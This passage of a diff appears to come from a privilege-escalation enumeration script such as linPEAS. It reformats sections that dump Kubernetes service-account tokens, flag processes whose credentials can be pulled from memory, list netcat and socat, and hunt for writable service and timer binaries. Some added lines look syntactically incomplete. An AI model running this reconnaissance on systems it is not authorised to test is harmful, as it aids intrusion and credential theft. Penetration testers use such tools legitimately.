"Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," +fi +if df -h | grep docker; then + print_2title "Docker Overlays" + df -h | grep docker +fi +fi - if [ "$inContainer" ]; then - echo "" - print_2title "Container & breakout enumeration" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname)" - if echo "$containerType" | grep -qi "docker"; then - print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" - fi - if echo "$containerType" | grep -qi "kubernetes"; then - print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" - print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" - fi +if [ "$inContainer" ]; then +echo "" +print_2title "Container & breakout enumeration" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" +print_list "Container ID ...................$NC $(cat /etc/hostname)" +if echo "$containerType" | grep -qi "docker"; then + print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" +fi +if echo "$containerType" | grep -qi "kubernetes"; then + print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" + print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" +fi - checkContainerExploits - print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - echo "" +checkContainerExploits +print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +echo "" - print_2title "Container Capabilities" - capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" - echo "" +print_2title "Container Capabilities" +capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" +echo "" - print_2title "Privilege Mode" - if [ -x "$(command -v fdisk)" ]; then - if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," - else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," - fi +print_2title "Privilege Mode" +if [ -x "$(command -v fdisk)" ]; then + if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," else - echo_not_found + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," fi - echo "" +else + echo_not_found +fi +echo "" - print_2title "Interesting Files Mounted" - (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" - echo "" +print_2title "Interesting Files Mounted" +(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" +echo "" - print_2title "Possible Entrypoints" - ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq - echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +print_2title "Possible Entrypoints" +ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq +echo "" fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if echo $CHECKS | grep -q available_software; +print_title "Available Software" +########################################### +#---------) Available Software (----------# +########################################### -if echo $CHECKS | grep -q Devs; then - ########################################### - #---------------) Devices (---------------# - ########################################### - print_title "Devices" +#-- 1AS) Useful software +print_2title "Useful software" +command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null +echo "" - #-- 1D) sd in /dev - print_2title "Any sd*/disk* disk in /dev? (limit 20)" - ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 - echo "" +#-- 2AS) Search for compilers +print_2title "Installed Compiler" +(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); +echo "" - #-- 2D) Unmounted - print_2title "Unmounted file-system?" - print_info "Check if you can mount umounted devices" - if [ -f "/etc/fstab" ]; then - grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" - else - echo_not_found "/etc/fstab" - fi - echo "" - - print_2title "Mounted disks information" - warn_exec diskutil list - echo "" - - print_2title "Mounted SMB Shares" - warn_exec smbutil statshares -a - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if [ "$(command -v pkg 2>/dev/null)" ]; then +print_2title "Vulnerable Packages" +pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" +echo "" fi - -if echo $CHECKS | grep -q AvaSof; then - ########################################### - #---------) Available Software (----------# - ########################################### - print_title "Available Software" - - #-- 1AS) Useful software - print_2title "Useful software" - command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null - echo "" - - #-- 2AS) Search for compilers - print_2title "Installed Compiler" - (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); - echo "" - - if [ "$(command -v pkg 2>/dev/null)" ]; then - print_2title "Vulnerable Packages" - pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Installed Packages" - brew list - echo "" - fi - - if [ "$MACPEAS" ]; then - print_2title "Writable Installed Applications" - system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - - system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - echo "" - - #Useless info - #print_2title "Developer Tools" - #system_profiler SPDeveloperToolsDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if [ "$(command -v brew 2>/dev/null)" ]; then +print_2title "Brew Installed Packages" +brew list +echo "" fi - -if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then - #################################################### - #-----) Processes & Cron & Services & Timers (-----# - #################################################### - print_title "Processes, Cron, Services, Timers & Sockets" - - #-- PCS) Cleaned proccesses - print_2title "Cleaned processes" - if [ "$NOUSEPS" ]; then - printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC - fi - print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - - if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - pslist=$(print_ps) - else - (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" - fi - fi - done - pslist=$(ps auxwww) - echo "" - - #-- PCS) Binary processes permissions - print_2title "Binary processes permissions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - binW="IniTialiZZinnggg" - ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do - if [ -w "$bpath" ]; then - binW="$binW|$bpath" - fi - done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," - fi - echo "" - - #-- PCS) Files opened by processes belonging to other users - if ! [ "$IAMROOT" ]; then - print_2title "Files opened by processes belonging to other users" - print_info "This is usually empty because of the lack of privileges to read other user processes information" - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - echo "" - fi - - #-- PCS) Processes with credentials inside memory - print_2title "Processes with credentials in memory (root req)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" - if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi - if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi - if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi - if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi - if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi - if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi - echo "" - - #-- PCS) Different processes 1 min - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then - print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" - temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi - echo "" - fi - - #-- PCS) Cron - print_2title "Cron jobs" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" - command -v crontab 2>/dev/null || echo_not_found "crontab" - crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - command -v incrontab 2>/dev/null || echo_not_found "incrontab" - incrontab -l 2>/dev/null - ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - crontab -l -u "$USER" 2>/dev/null | tr -d "\r" - ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths - atq 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Third party LaunchAgents & LaunchDemons" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" - ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null - echo "" - - print_2title "Writable System LaunchAgents & LaunchDemons" - find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do - program="" - program=$(defaults read "$f" Program 2>/dev/null) - if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) - fi - if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - done - echo "" - - print_2title "StartupItems" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" - ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null - echo "" - - print_2title "Login Items" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" - osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null - echo "" - - print_2title "SPStartupItemDataType" - system_profiler SPStartupItemDataType - echo "" - - print_2title "Emond scripts" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" - ls -l /private/var/db/emondClients - echo "" - fi - - #-- PCS) Services - print_2title "Services" - print_info "Search for outdated versions" - (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" - echo "" - - #-- PSC) systemd PATH - print_2title "Systemd PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" - systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" - WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") - echo "" - - #-- PSC) .service files - #TODO: .service files in MACOS are folders - print_2title "Analyzing .service files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" - printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do - if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" - fi - servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths - printf "%s\n" "$servicebinpaths\n" | while read sp; do - if [ -w "$sp" ]; then - echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" - fi - done - relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") - relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") - if [ "$relpath1" ] || [ "$relpath2" ]; then - if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; - else - echo "$s is executing some relative path" - fi - fi +if [ "$MACPEAS" ]; then +print_2title "Writable Installed Applications" +system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" fi - done - if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi - echo "" +done - #-- PSC) Timers - print_2title "System timers" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found - echo "" - - #-- PSC) .timer files - print_2title "Analyzing .timer files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do - if ! [ "$IAMROOT" ] && [ -w "$t" ]; then - echo "$t" | sed -${E} "s,.*,${SED_RED},g" +system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi +done + +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets; +print_title "Processes, Crons, Timers, Services and Sockets" +#################################################### +#-----) Processes & Cron & Services & Timers (-----# +#################################################### + +#-- PCS) Cleaned proccesses +print_2title "Cleaned processes" +if [ "$NOUSEPS" ]; then +printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC +fi +print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + +if [ "$NOUSEPS" ]; then +print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," +pslist=$(print_ps) +else +(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi + fi +done +pslist=$(ps auxwww) +echo "" + +#-- PCS) Binary processes permissions +print_2title "Binary processes permissions" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" +binW="IniTialiZZinnggg" +ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + if [ -w "$bpath" ]; then + binW="$binW|$bpath" + fi +done +ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," +fi +echo "" + +#-- PCS) Files opened by processes belonging to other users +if ! [ "$IAMROOT" ]; then +print_2title "Files opened by processes belonging to other users" +print_info "This is usually empty because of the lack of privileges to read other user processes information" +lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +echo "" +fi + +#-- PCS) Processes with credentials inside memory +print_2title "Processes with credentials in memory (root req)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" +if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi +if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi +if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi +if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi +if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi +if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi +echo "" + +#-- PCS) Different processes 1 min +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then +print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" +temp_file=$(mktemp) +if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi +echo "" +fi + +#-- PCS) Cron +print_2title "Cron jobs" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" +command -v crontab 2>/dev/null || echo_not_found "crontab" +crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +command -v incrontab 2>/dev/null || echo_not_found "incrontab" +incrontab -l 2>/dev/null +ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" +cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +crontab -l -u "$USER" 2>/dev/null | tr -d "\r" +ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths +atq 2>/dev/null +echo "" + +if [ "$MACPEAS" ]; then +print_2title "Third party LaunchAgents & LaunchDemons" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" +ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null +echo "" + +print_2title "Writable System LaunchAgents & LaunchDemons" +find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + program="" + program=$(defaults read "$f" Program 2>/dev/null) + if ! [ "$program" ]; then + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + fi + if [ -w "$program" ]; then + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi +done +echo "" + +print_2title "StartupItems" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" +ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null +echo "" + +print_2title "Login Items" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" +osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null +echo "" + +print_2title "SPStartupItemDataType" +system_profiler SPStartupItemDataType +echo "" + +print_2title "Emond scripts" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" +ls -l /private/var/db/emondClients +echo "" +fi + +#-- PCS) Services +print_2title "Services" +print_info "Search for outdated versions" +(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" +echo "" + +#-- PSC) systemd PATH +print_2title "Systemd PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" +systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" +WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") +echo "" + +#-- PSC) .service files +#TODO: .service files in MACOS are folders +print_2title "Analyzing .service files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" +printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do +if [ ! -O "$s" ]; then #Remove services that belongs to the current user + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi + servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths + printf "%s\n" "$servicebinpaths\n" | while read sp; do + if [ -w "$sp" ]; then + echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" fi - timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) - printf "%s\n" "$timerbinpaths" | while read tb; do - if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed 